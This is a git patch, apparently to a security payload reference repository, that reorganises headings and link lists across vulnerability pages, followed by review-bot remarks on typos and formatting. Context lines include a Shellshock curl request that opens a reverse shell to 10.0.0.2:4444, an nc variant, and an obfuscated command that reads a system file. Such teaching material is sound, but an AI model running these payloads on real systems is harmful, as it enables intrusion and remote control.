From d80f73a829c40ecedcc8bbf57f4961f9c8e460e5 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 9 Nov 2024 23:01:39 +0100 Subject: [PATCH] Normalize page header for API, CSPT, CORS, CSRF --- API Key Leaks/IIS-Machine-Keys.md | 12 ++--- CORS Misconfiguration/README.md | 55 +++++++++++++---------- CRLF Injection/README.md | 2 +- CVE Exploits/README.md | 29 +++++++++++-- Clickjacking/README.md | 13 +++--- Client Side Path Traversal/README.md | 21 +++++---- Command Injection/README.md | 65 +++++++++++++++------------- SQL Injection/README.md | 2 +- _LEARNING_AND_SOCIALS/YOUTUBE.md | 1 + _template_vuln/README.md | 25 +++++++---- 10 files changed, 135 insertions(+), 90 deletions(-) diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md index 004be95..cad6573 100644 --- a/API Key Leaks/IIS-Machine-Keys.md +++ b/API Key Leaks/IIS-Machine-Keys.md @@ -16,12 +16,6 @@ * [References](#references) -**Requirements** - -* `__VIEWSTATE` -* `__VIEWSTATEGENERATOR`* - - ## Viewstate Format ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information. @@ -135,6 +129,12 @@ List of interesting machine keys to use: First you need to decode the Viewstate to know if the MAC and the encryption are enabled. +**Requirements** + +* `__VIEWSTATE` +* `__VIEWSTATEGENERATOR` + + ### MAC Is Not Enabled ```ps1 diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 0a09568..f805bc6 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md 
@@ -2,13 +2,21 @@ > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. + ## Summary * [Tools](#tools) -* [Prerequisites](#prerequisites) +* [Requirements](#requirements) * [Exploitation](#exploitation) + * [Origin Reflection](#origin-reflection) + * [Null Origin](#null-origin) + * [XSS on Trusted Origin](#xss-on-trusted-origin) + * [Wildcard Origin `*` without Credentials](#wildcard-origin--without-credentials) + * [Expanding the Origin](#expanding-the-origin) +* [Labs](#labs) * [References](#references) + ## Tools * [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/) @@ -17,17 +25,19 @@ * [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors) * [omranisecurity/CorsOne - Fast CORS Misconfiguration Discovery Tool](https://github.com/omranisecurity/CorsOne) -## Prerequisites + +## Requirements * BURP HEADER> `Origin: https://evil.com` * VICTIM HEADER> `Access-Control-Allow-Credential: true` * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` + ## Exploitation Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`. -### Vulnerable Example: Origin Reflection +### Origin Reflection #### Vulnerable Implementation @@ -87,7 +97,7 @@ or ``` -### Vulnerable Example: Null Origin +### Null Origin #### Vulnerable Implementation 
@@ -128,7 +138,7 @@ origin in the request: "> ``` -### Vulnerable Example: XSS on Trusted Origin +### XSS on Trusted Origin If the application does implement a strict whitelist of allowed origins, the exploit codes from above do not work. But if you have an XSS on a trusted @@ -139,7 +149,7 @@ again. https://trusted-origin.example.com/?xss= ``` -### Vulnerable Example: Wildcard Origin `*` without Credentials +### Wildcard Origin `*` without Credentials If the server responds with a wildcard origin `*`, **the browser does never send the cookies**. However, if the server does not require authentication, it's still @@ -178,7 +188,9 @@ function reqListener() { }; ``` -### Vulnerable Example: Expanding the Origin / Regex Issues + +### Expanding the Origin + Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header. #### Vulnerable Implementation (Example 1) 
@@ -247,26 +259,25 @@ function reqListener() { }; ``` + ## Labs -* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) -* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) -* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack) -* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack) +* [PortSwigger - CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) +* [PortSwigger - CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) +* [PortSwigger - CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack) +* [PortSwigger - CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack) -## Bug Bounty reports - -* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) -* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) -* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) -* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) -* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) ## References -- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 
2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +- [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298) +- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/) +- [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://hackerone.com/reports/426147) +- [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://hackerone.com/reports/430249) +- [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://hackerone.com/reports/168574) +- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) +- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors) +- [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://hackerone.com/reports/235200) - [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) - [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) -- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/) -- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors) -- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 
2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) \ No newline at end of file +- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) \ No newline at end of file diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index b5a1d04..84b028e 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -112,7 +112,7 @@ Remainder: ## Labs -* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) +* [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) ## References diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 1ea0374..34aef72 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md 
@@ -1,5 +1,21 @@ # Common Vulnerabilities and Exposures +A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems. + +## Summary + +* [Tools](#tools) +* [Big CVEs in the last 15 years](#big-cves-in-the-last-15-years) + * [CVE-2017-0144 - EternalBlue](#cve-2017-0144---eternalblue) + * [CVE-2017-5638 - Apache Struts 2](#cve-2017-5638---apache-struts-2) + * [CVE-2018-7600 - Drupalgeddon 2](#cve-2018-7600---drupalgeddon-2) + * [CVE-2019-0708 - BlueKeep](#cve-2019-0708---bluekeep) + * [CVE-2019-19781 - Citrix ADC Netscaler](#cve-2019-19781---citrix-adc-netscaler) + * [CVE-2014-0160 - Heartbleed](#cve-2014-0160---heartbleed) + * [CVE-2014-6271 - Shellshock](#cve-2014-6271---shellshock) +* [References](#references) + + ## Tools - [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve) @@ -8,7 +24,7 @@ - [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com) -## Big CVEs in the last 5 years. +## Big CVEs in the last 15 years ### CVE-2017-0144 - EternalBlue 
@@ -24,19 +40,23 @@ Afftected systems: - Windows 10 Gold, 1511, and 1607 - Windows Server 2016 + ### CVE-2017-5638 - Apache Struts 2 On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. + ### CVE-2018-7600 - Drupalgeddon 2 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. + ### CVE-2019-0708 - BlueKeep A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. -### CVE-2019-19781 - Citrix ADC Netscaler + +### CVE-2019-19781 - Citrix ADC Netscaler A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution. 
@@ -47,12 +67,12 @@ Affected products: - Citrix ADC and NetScaler Gateway version 11.1 all supported builds - Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds -## Older, but not forgotten ### CVE-2014-0160 - Heartbleed The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). + ### CVE-2014-6271 - Shellshock Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. @@ -62,7 +82,8 @@ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0 curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" ``` -## Thanks to + +## References * [Heartbleed - Official website](http://heartbleed.com) * [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug)) diff --git a/Clickjacking/README.md b/Clickjacking/README.md index c49e7ca..23a23e8 100644 --- a/Clickjacking/README.md +++ b/Clickjacking/README.md 
@@ -1,9 +1,6 @@ # Clickjacking -> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, -> potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions -> as such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions -> that a normal user can do on a legitimate website can be done using clickjacking. +> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions as such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions that a normal user can do on a legitimate website can be done using clickjacking. ## Summary @@ -22,8 +19,8 @@ * [IE8 XSS filter](#ie8-xss-filter) * [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter) * [Challenge](#challenge) -* [Practice Environments](#practice-environments) -* [Reference](#references) +* [Labs](#labs) +* [References](#references) ## Tools 
@@ -229,10 +226,10 @@ Inspect the following code: Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website. -## Practice Environments +## Labs * [OWASP WebGoat](https://owasp.org/www-project-webgoat/) -* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking) +* [OWASP Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking) ## References diff --git a/Client Side Path Traversal/README.md b/Client Side Path Traversal/README.md index 0bb598f..9580429 100644 --- a/Client Side Path Traversal/README.md +++ b/Client Side Path Traversal/README.md 
@@ -1,15 +1,18 @@ # Client Side Path Traversal -Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks. -It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches. -Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks. +> Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks. + +> It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches. + +> Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks. + ## Summary * [Tools](#tools) -* [Lab](#lab) * [CSPT to XSS](#cspt-to-xss) * [CSPT to CSRF](#cspt-to-xss) +* [Labs](#labs) * [References](#references) 
@@ -18,11 +21,6 @@ Since every request is initiated from within the frontend of the application, th * [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal. -## Lab - -* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT). - - ## CSPT to XSS ![](https://matanber.com/images/blog/cspt-query-param.png) @@ -61,6 +59,11 @@ Real-World Scenarios: * [CVE-2023-5123 : CSPT2CSRF in Grafana’s JSON API Plugin](https://medium.com/@maxime.escourbiac/grafana-cve-2023-5123-write-up-74e1be7ef652) +## Labs + +* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT). + + ## References - [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://blog.doyensec.com/2024/07/02/cspt2csrf.html) diff --git a/Command Injection/README.md b/Command Injection/README.md index 94b0267..1d965d6 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md 
@@ -2,40 +2,41 @@ > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. + ## Summary * [Tools](#tools) * [Exploits](#exploits) - * [Basic commands](#basic-commands) - * [Chaining commands](#chaining-commands) - * [Argument injection](#argument-injection) - * [Inside a command](#inside-a-command) + * [Basic commands](#basic-commands) + * [Chaining commands](#chaining-commands) + * [Argument injection](#argument-injection) + * [Inside a command](#inside-a-command) * [Filter Bypasses](#filter-bypasses) - * [Bypass without space](#bypass-without-space) - * [Bypass with a line return](#bypass-with-a-line-return) - * [Bypass with backslash newline](#bypass-with-backslash-newline) - * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) - * [Bypass with Tilde expansion](#bypass-with-tilde-expansion) - * [Bypass with Brace expansion](#bypass-with-brace-expansion) - * [Bypass characters filter](#bypass-characters-filter) - * [Bypass blacklisted words](#bypass-blacklisted-words) - * [Bypass with single quote](#bypass-with-single-quote) - * [Bypass with double quote](#bypass-with-double-quote) - * [Bypass with backticks](#bypass-with-backticks) - * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) - * [Bypass with $@](#bypass-with-) - * [Bypass with $()](#bypass-with--1) - * [Bypass with variable expansion](#bypass-with-variable-expansion) - * [Bypass with wildcards](#bypass-with-wildcards) + * [Bypass without space](#bypass-without-space) + * [Bypass with a line return](#bypass-with-a-line-return) + * [Bypass with backslash newline](#bypass-with-backslash-newline) + * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) + * [Bypass with Tilde expansion](#bypass-with-tilde-expansion) + * [Bypass with Brace expansion](#bypass-with-brace-expansion) + * [Bypass characters filter](#bypass-characters-filter) + * 
[Bypass blacklisted words](#bypass-blacklisted-words) + * [Bypass with single quote](#bypass-with-single-quote) + * [Bypass with double quote](#bypass-with-double-quote) + * [Bypass with backticks](#bypass-with-backticks) + * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) + * [Bypass with $@](#bypass-with-) + * [Bypass with $()](#bypass-with--1) + * [Bypass with variable expansion](#bypass-with-variable-expansion) + * [Bypass with wildcards](#bypass-with-wildcards) * [Data Exfiltration](#data-exfiltration) - * [Time based data exfiltration](#time-based-data-exfiltration) - * [DNS based data exfiltration](#dns-based-data-exfiltration) + * [Time based data exfiltration](#time-based-data-exfiltration) + * [DNS based data exfiltration](#dns-based-data-exfiltration) * [Polyglot Command Injection](#polyglot-command-injection) * [Tricks](#tricks) - * [Backgrounding long running commands](#backgrounding-long-running-commands) - * [Remove arguments after the injection](#remove-arguments-after-the-injection) + * [Backgrounding long running commands](#backgrounding-long-running-commands) + * [Remove arguments after the injection](#remove-arguments-after-the-injection) * [Labs](#labs) -* [Challenge](#challenge) + * [Challenge](#challenge) * [References](#references) 
@@ -417,14 +418,14 @@ In Unix-like command-line interfaces, the `--` symbol is used to signify the end ## Labs -* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) -* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) -* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) -* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) -* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) +* [PortSwigger - OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) +* [PortSwigger - Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) +* [PortSwigger - Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) +* [PortSwigger - Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) +* [PortSwigger - Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) -## Challenge +### Challenge Challenge based on the previous tricks, what does the following command do: @@ -432,6 +433,8 @@ Challenge based on the previous tricks, what does the following command do: g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/} ``` +**NOTE**: The command is safe to run, but you should not trust me. + ## References 
diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 7902125..422d78e 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -20,7 +20,7 @@ Attempting to manipulate SQL queries may have goals including: * [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md) * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md) -* [SQLmap Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md) + * [SQLmap](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md) * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [Authentication bypass](#authentication-bypass) diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md index 6a15bc7..7ed2611 100644 --- a/_LEARNING_AND_SOCIALS/YOUTUBE.md +++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md @@ -27,6 +27,7 @@ - [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg) - [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU) + ## Conferences - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4) diff --git a/_template_vuln/README.md b/_template_vuln/README.md index 4d8a504..ea2ab7f 100644 --- a/_template_vuln/README.md +++ b/_template_vuln/README.md 
@@ -5,18 +5,20 @@ ## Summary * [Tools](#tools) -* [Something](#something) - * [Subentry 1](#subentry-1) - * [Subentry 2](#subentry-2) +* [Methodology](#methodology) + * [Subentry 1](#subentry-1) + * [Subentry 2](#subentry-2) +* [Labs](#labs) +* [References](#references) ## Tools -- [Tool 1](https://example.com) -- [Tool 2](https://example.com) +- [username/tool1](https://github.com/username/tool1) - Description of the tool +- [username/tool2](https://github.com/username/tool2) - Description of the tool -## Something +## Methodology Quick explanation @@ -24,13 +26,20 @@ Quick explanation Exploit ``` - ### Subentry 1 ### Subentry 2 +## Labs + +- [Company - Lab 1](#link-to-the-lab) +- [Company - Lab 2](#link-to-the-lab) +- [Company - Challenge 1](#link-to-the-challenge) +- [Company - Challenge 2](#link-to-the-challenge) + + ## References -- [Blog title - Author, Date](https://example.com) \ No newline at end of file +- [Blog title - Author (@handle) - Month XX, 202X](https://example.com) \ No newline at end of file
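Review bot: the subject line "Normalize page header for API, CSPT, CORS, CSRF" does not match the diffstat above it: no CSRF file is touched, while CRLF Injection, CVE Exploits, Clickjacking, Command Injection, SQL Injection, _LEARNING_AND_SOCIALS/YOUTUBE.md and _template_vuln all are. A subject that names the actual scope (for example "Normalize Summary/Labs/References headers across vulnerability pages") keeps the history searchable.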
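Review bot: in the `API Key Leaks/IIS-Machine-Keys.md` hunk, the relocated Requirements block is inserted between the sentence "First you need to decode the Viewstate to know if the MAC and the encryption are enabled." and the `### MAC Is Not Enabled` heading, which separates that sentence from the subsection it introduces; placing the block before the sentence reads more naturally. Dropping the stray trailing `*` from the old `` * `__VIEWSTATEGENERATOR`* `` line is a good catch.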
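Review bot: in the first `CORS Misconfiguration/README.md` hunk, the section renamed to Requirements still carries the misspelled header name `Access-Control-Allow-Credential: true` on an unchanged line; the response header a tester must look for is `Access-Control-Allow-Credentials`, so the typo sends readers grepping for the wrong string. Since the heading is being rewritten, fix the line in the same commit: `* VICTIM HEADER> `Access-Control-Allow-Credentials: true``.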
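Review bot: the CORS hunks that strip the "Vulnerable Example:" prefix from the `###` headings leave two grammar slips in the adjacent unchanged text: "the browser does never send the cookies" under Wildcard Origin (should be "never sends") and "a badly implemented regular expressions" under Expanding the Origin (singular/plural mismatch). Both are one-word fixes and worth folding in while those headings are touched.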
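Review bot: merging the "Bug Bounty reports" list into References with dates and alphabetical order matches the convention the other pages in this patch follow, but the CORS file still ends on the "Think Outside the Scope" entry with `\ No newline at end of file`; add the trailing newline so the next entry appended to References does not show up as a change to this line.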
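Review bot: in the `CVE Exploits/README.md` summary hunk, the new table of contents lists CVE-2014-0160 and CVE-2014-6271 after the 2017-2019 entries, which mirrors the body order once the `## Older, but not forgotten` heading is removed in the later hunk. Either reorder the subsections chronologically (2014 first) or keep a short grouping heading, otherwise the "Big CVEs in the last 15 years" list reads as unsorted. The hunk header also shows the unchanged context "Afftected systems:" under EternalBlue, and the Shellshock paragraph has "a family of security bug"; both typos are cheap to fix in this pass.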
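Review bot: in the `Clickjacking/README.md` hunk, reflowing the four `>` lines into one is fine for rendering, but the replaced line still contains "as such as typing in the password" and "clicking on ‘Delete my account’ button"; since the whole line is rewritten anyway, drop the extra "as" and add "the" before the button name. The `Reference` to `References` change in the summary fixes a dead anchor, since the heading in the file is `## References`.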
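Review bot: in the `Client Side Path Traversal/README.md` hunk, the three `>` paragraphs are separated by blank lines, so Markdown renders three separate blockquotes rather than one quoted intro; the other pages in this patch (CORS, Clickjacking, Command Injection) use a single blockquote, so either join the sentences into one `>` block (with `>` on the blank lines) or collapse them onto one line as was done for Clickjacking. Separately, the unchanged summary line `* [CSPT to CSRF](#cspt-to-xss)` points at the XSS anchor; it should presumably be `#cspt-to-csrf` to match its own section.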
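Review bot: in the `Command Injection/README.md` hunks, moving `Challenge` under `Labs` in the summary and demoting the heading to `### Challenge` in the later hunk keeps the table of contents and the headings in sync, good. The added line "**NOTE**: The command is safe to run, but you should not trust me." is the right caution for an obfuscated command; consider stating that the exercise is to resolve it by hand using the expansion tricks described earlier on the page rather than by executing it.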
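Review bot: in the `SQL Injection/README.md` hunk, the new `* [SQLmap]` line is indented one level deeper than its neighbours `* [HQL Injection]` and `* [DB2 Injection]`, so in the rendered list the cheatsheet becomes a child of the DB2 entry. If it belongs with the per-DBMS pages, keep it at the same level; if it is meant to be a separate subtree, give it a parent entry.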
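Review bot: in the `_template_vuln/README.md` hunk, the Summary uses `*` bullets while Tools, Labs and References use `-`; since every new page is copied from this template, picking one marker here avoids propagating the inconsistency. The `#link-to-the-lab` and `#link-to-the-challenge` anchors work as visible placeholders. The file still ends without a trailing newline (`\ No newline at end of file` on the References entry); add one.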